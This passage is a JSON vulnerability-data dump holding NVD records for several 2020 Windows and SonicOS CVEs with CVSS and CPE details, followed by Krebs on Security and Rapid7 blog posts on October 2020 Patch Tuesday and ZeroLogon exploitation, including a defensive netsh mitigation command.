"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1167", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:26:14", "description": "A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1167.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16923", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1167", "CVE-2020-16923"], "modified": "2020-10-20T15:02:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-16923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16923", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-03-23T14:25:25", "description": "An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16909.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16905", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16905", "CVE-2020-16909"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16905", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:31", "description": "An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16905.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16909", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16905", "CVE-2020-16909"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16909", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:20", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16938.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16901", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16901", "CVE-2020-16938"], "modified": "2020-10-20T20:26:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1909"], "id": "CVE-2020-16901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16901", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:26:42", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16901.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16938", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16901", "CVE-2020-16938"], "modified": "2020-10-20T20:05:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:2004"], "id": "CVE-2020-16938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16938", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:36:31", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-12T11:15:00", "type": "cve", "title": "CVE-2020-5135", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-23T00:55:00", "cpe": ["cpe:/o:sonicwall:sonicosv:6.5.4.4", "cpe:/o:sonicwall:sonicos:6.0.5.3", "cpe:/o:sonicwall:sonicos:6.5.1.11", "cpe:/o:sonicwall:sonicos:6.5.4.7", "cpe:/o:sonicwall:sonicos:7.0.0.0"], "id": "CVE-2020-5135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sonicwall:sonicos:7.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.5.1.11:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.5.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicosv:6.5.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.0.5.3:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2020-10-21T10:10:49", "description": "It&#x27;s Cybersecurity Awareness Month! In keeping with that theme, if you (ab)use **Microsoft Windows** computers you should be aware the company shipped a bevy of software updates today to fix at least 87 security problems in Windows and programs that run on top of the operating system. That means it&#x27;s once again time to backup and patch up.\n\n\n\nEleven of the vulnerabilities earned Microsoft&#x27;s most-dire &quot;critical&quot; rating, which means bad guys or malware could use them to gain complete control over an unpatched system with little or no help from users.\n\nWorst in terms of outright scariness is probably [CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>), which is a nasty bug in **Windows 10** and **Windows Server 2019** that could be abused to install malware just by sending a malformed packet of data at a vulnerable system. CVE-2020-16898 earned a [CVSS Score](<https://www.first.org/cvss/>) of 9.8 (10 is the most awful).\n\nSecurity vendor **McAfee** has dubbed the flaw &quot;**Bad Neighbor**,&quot; and in [a blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>) about it said a proof-of-concept exploit shared by Microsoft with its partners appears to be &quot;both extremely simple and perfectly reliable,&quot; noting that this sucker is imminently &quot;wormable&quot; -- i.e. capable of being weaponized into a threat that spreads very quickly within networks.\n\n&quot;It results in an immediate BSOD (Blue Screen of Death), but more so, indicates the likelihood of exploitation for those who can manage to bypass Windows 10 and Windows Server 2019 mitigations,&quot; McAfee&#x27;s **Steve Povolny** wrote. &quot;The effects of an exploit that would grant remote code execution would be widespread and highly impactful, as this type of bug could be made wormable.&quot;\n\n**Trend Micro&#x27;s Zero Day Initiative** (ZDI) calls special attention to another critical bug quashed in this month&#x27;s patch batch: [CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>), which is a problem with **Microsoft Outlook** that could result in malware being loaded onto a system_ just by previewing a malicious email in Outlook_.\n\n&quot;The Preview Pane is an attack vector here, so you don\u2019t even need to open the mail to be impacted,&quot; said ZDI&#x27;s** Dustin Childs**.\n\nWhile there don&#x27;t appear to be any zero-day flaws in October&#x27;s release from Microsoft, **Todd Schell** from **Ivanti** points out that a half-dozen of these flaws were publicly disclosed prior to today, meaning bad guys have had a jump start on being able to research and engineer working exploits.\n\nOther patches released today tackle problems in **Exchange Server**, **Visual Studio**, **.NET Framework**, and a whole mess of other core Windows components.\n\nFor any of you who&#x27;ve been pining for a **Flash Player** patch from **Adobe**, your days of waiting are over. After several months of depriving us of Flash fixes, Adobe&#x27;s shipped an update that fixes a single -- [albeit critical](<https://helpx.adobe.com/security/products/flash-player/apsb20-58.html>) -- flaw in the program that crooks could use to install bad stuff on your computer just by getting you to visit a hacked or malicious website.\n\n**Chrome** and **Firefox** both now disable Flash by default, and Chrome and **IE/Edge** auto-update the program when new security updates are available. Mercifully, Adobe is slated to retire Flash Player later this year, and Microsoft has said it plans to ship updates at the end of the year that will remove Flash from Windows machines.\n\nIt&#x27;s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it&#x27;s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any chinks in the new armor.\n\nBut before you update, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates even have known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T20:10:36", "type": "krebs", "title": "Microsoft Patch Tuesday, October 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898", "CVE-2020-16947"], "modified": "2020-10-13T20:10:36", "id": "KREBS:7252221B56E65C46DEF83A6DDC0B70FB", "href": "https://krebsonsecurity.com/2020/10/microsoft-patch-tuesday-october-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-24T17:42:40", "description": "**Microsoft** warned on Wednesday that malicious hackers are exploiting a particularly dangerous flaw in **Windows Server** systems that could be used to give attackers the keys to the kingdom inside a vulnerable corporate network. Microsoft&#x27;s warning comes just days after the **U.S. Department of Homeland Security** issued an emergency directive instructing all federal agencies to patch the vulnerability by Sept. 21 at the latest.\n\n\n\nDHS&#x27;s **Cybersecurity and Infrastructure Agency** (CISA) said [in the directive](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon>) that it expected imminent exploitation of the flaw -- [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) and dubbed &quot;ZeroLogon&quot; -- because exploit code which can be used to take advantage of it [was circulating online](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>).\n\nLast night, Microsoft&#x27;s Security Intelligence unit [tweeted](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) that the company is &quot;tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon vulnerability.&quot;\n\n&quot;We have observed attacks where public exploits have been incorporated into attacker playbooks,&quot; Microsoft said. &quot;We strongly recommend customers to immediately apply security updates.&quot;\n\nMicrosoft [released a patch for the vulnerability in August](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>), but it is not uncommon for businesses to delay deploying updates for days or weeks while testing to ensure the fixes do not interfere with or disrupt specific applications and software.\n\nCVE-2020-1472 earned Microsoft&#x27;s most-dire &quot;critical&quot; severity rating, meaning attackers can exploit it with little or no help from users. The flaw is present in most supported versions of Windows Server, from **Server 2008** through **Server 2019**.\n\nThe vulnerability could let an unauthenticated attacker gain administrative access to a Windows domain controller and run an application of their choosing. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\n**Scott Caveza**, research engineering manager at security firm [Tenable](<https://www.tenable.com>), said several samples of malicious .NET executables with the filename \u2018SharpZeroLogon.exe\u2019 have been uploaded to VirusTotal, a service owned by Google that scans suspicious files against dozens of antivirus products.\n\n&quot;Given the flaw is easily exploitable and would allow an attacker to completely take over a Windows domain, it should come as no surprise that we\u2019re seeing attacks in the wild,&quot; Caveza said. &quot;Administrators should prioritize patching this flaw as soon as possible. Based on the rapid speed of exploitation already, we anticipate this flaw will be a popular choice amongst attackers and integrated into malicious campaigns.&quot;", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-24T17:00:51", "type": "krebs", "title": "Microsoft: Attackers Exploiting \u2018ZeroLogon\u2019 Windows Flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T17:00:51", "id": "KREBS:952ACEBFD55EBD076910C6B233491883", "href": "https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-10-21T08:41:22", "description": "\n\nMicrosoft brings us an October's Update Tuesday with 87 vulnerabilities, a sub-100 number we haven't experienced in quite some time. To further add to this oddity, there are no Browser-based vulnerabilities to mention and the arrival of a new Adobe Flash vulnerability [CVE-2020-9746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200012>). Despite this month's lower numbers, there are some precautions we should all take to remediate our environments quickly and effectively.\n\n## Starting with Microsoft Windows\n\nAs usual, whenever possible, it's better to prioritize updates against the Windows operating system. Coming in at 53 of the 87 vulnerabilities, patching the OS knocks out 60% of the vulnerabilities listed along with over half of the critical remote code execution vulnerabilities resolved today.\n\n### [Microsoft CVE-2020-16898: Microsoft TCP/IP Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)\n\nWith a CVSS score of 9.8 and marked as \"Exploitation More Likely\", this vulnerability grants the ability to execute code on target Windows 10 (version 1709+), Windows Server 2019, and Windows Server version 1903+ systems due to improper handling of ICMPv6 Router Advertisement packets.\n\nLuckily, if immediate patching isn't viable due to reboot scheduling, [Microsoft provides PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems. The PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.\n\n### [Microsoft CVE-2020-16896: Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16896>)\n\nRDP has been a [focal point for some of recent attacks](<https://blog.rapid7.com/2020/10/09/psa-increase-in-rdp-attacks-means-its-time-to-mind-your-rdps-and-qs/>) (e.g. BlueKeep), so whenever Microsoft provides another fix within that realm, it's prudent to make note of some specifics. CVE-2020-16896 is an information disclosure vulnerability where, when successfully exploited, allows unauthorized read access to the Windows RDP server process.\n\nThis RDP vulnerability, like previous ones of late, affects all supported Windows operating systems, and can continue to be mitigated by practices such as enabling Network Level Authentication (NLA) or by blocking TCP port 3389 at the enterprise perimeter firewall.\n\n### [Microsoft CVE-2020-16911: GDI+ Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>)\n\nCritical remote code execution vulnerability CVE-2020-16911 leverages how the Windows Graphics Device 